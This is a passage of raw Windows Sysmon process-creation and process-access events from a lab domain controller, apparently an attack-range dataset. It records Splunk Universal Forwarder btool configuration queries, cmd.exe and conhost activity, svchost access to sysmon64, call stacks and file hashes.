Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.753{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000008224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E200-00000000AE01}62806308C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.746{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000008216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.725{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.725{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.709{266CAFBE-64EE-6064-E100-00000000AE01}44806180C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-E000-00000000AE01}71487152C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.457{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 